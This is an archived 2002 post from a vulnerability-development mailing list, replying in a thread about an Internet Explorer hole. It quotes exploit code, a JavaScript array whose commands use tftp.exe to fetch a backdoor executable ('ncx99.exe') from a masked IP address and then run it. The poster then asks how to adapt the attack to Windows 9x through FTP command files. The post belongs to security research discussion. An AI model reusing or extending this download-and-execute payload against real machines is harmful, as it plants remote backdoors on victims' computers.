Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Rather large MSIE-hole

From: Felipe Franciosi <franciozzy () terra com br>
Date: Thu, 14 Mar 2002 08:41:01 -0300
var programName=new Array(
     'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
     'c:/winnt/system32/ncx99.exe',
 );


MS Windows 9x don't have trivial ftp client by default... I was
thinking how this could be exploitable on these versions...

The FTP client offers the option to read a text-file containing
line separated commands.

But I couldn't get to work something like:
var prog...
      'c:/command.com /c echo bin > c:/list.txt',
      'c:/command.com /c echo GET something >> c:/list.txt'

this won't create 'list.txt'... Any ideas why? Or how some could
get around it?

Regards,
Felipe

--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Felipe Franciosi        paradoxo networking
 felipe at paradoxo dot org
 http://www.paradoxo.org   Porto Alegre - RS
 Fone: (55)(51)9123-0557      UIN - 33596050
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Previous By Date Next
Previous By Thread Next

Current thread: